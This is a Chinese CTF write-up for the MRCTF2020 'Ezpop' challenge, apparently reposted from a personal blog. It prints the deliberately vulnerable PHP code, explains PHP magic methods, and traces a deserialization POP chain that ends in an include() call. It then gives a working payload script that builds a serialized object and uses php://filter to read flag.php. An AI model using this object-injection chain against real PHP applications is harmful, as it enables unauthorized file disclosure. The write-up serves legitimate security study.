[MRCTF2020]Ezpop
本文最后更新于 559 天前,其中的信息可能已经有所发展或是发生改变。
直接上代码审计了
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}一道反序列化题,甚至给出了教学链接,虽然现在已经无法访问了
反序列化魔术方法
__wakeup() //使用unserialize时触发
__sleep() //使用serialize时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callStatic() //在静态上下文中调用不可访问的方法时触发
__get() //用于从不可访问的属性读取数据
__set() //用于将数据写入不可访问的属性
__isset() //在不可访问的属性上调用isset()或empty()触发
__unset() //在不可访问的属性上使用unset()时触发
__toString() //把类当作字符串使用时触发
__invoke() //当脚本尝试将对象调用为函数时触发第一步肯定是要找利用点
class Modifier {
protected $var;
public function append($value){
include($value); // 很明显的文件包含
}
public function __invoke(){
$this->append($this->var); // 调用__invoke()就会触发append函数文件包含
}
}第二步调用__invoke()
get()中将function以函数的方法调用,如果能将\p实例化为一个对象就能成功调用invoke()魔术方法
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}第三步调用get() & toString()
get()方法会在访问不存在的成员变量时触发 toString()方法会在把类当作字符串使用时触发 __wakup()方法会在反序列化的时候直接触发
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source; // 这里触发了__get()
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) { // 这里触发了__toString()
echo "hacker";
$this->source = "index.php";
}
}
}调用链
Modifier::__invoke()<--Test::__get()<--Show::__toString()<--Show::__wakeup()总结:GET接收到pop的时候反序列化触发wakeup(),在进行正则匹配的时候将source当成字符串触发了toString(),toString()中访问$str不存在的成员变量触发get(),get()中如果将对象以函数的方法调用就会触发invoke(),__invoke()会调用append()从而拿到flag。
payload
<?php
class Modifier {
public $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Test{
public $p;
}
class Show{
public $source;
public $str;
public function __construct($file){
$this->source = $file;
}
}
$a = new Show(aaa);//实例化Show 传入aaa只是为了满足__construct
$a->str=new Test();//实例化成一个没有source属性的类
$a->str->p = new Modifier();//实例化p
$b=new Show($a);//因为我们要传入$file=一个类 这样$this->source=$file之后 在正则过滤时 就是一个类被当作字符串对待 触发__toString
echo urlencode(serialize($b));//输出浏览量: 77
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021-10-15 ,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
代码审计
代码审计(Code Audit,CA)提供通过自动化分析工具和人工审查的组合审计方式,对程序源代码逐条进行检查、分析,发现其中的错误信息、安全隐患和规范性缺陷问题,以及由这些问题引发的安全漏洞,提供代码修订措施和建议。支持脚本类语言源码以及有内存控制类源码。
腾讯云开发者
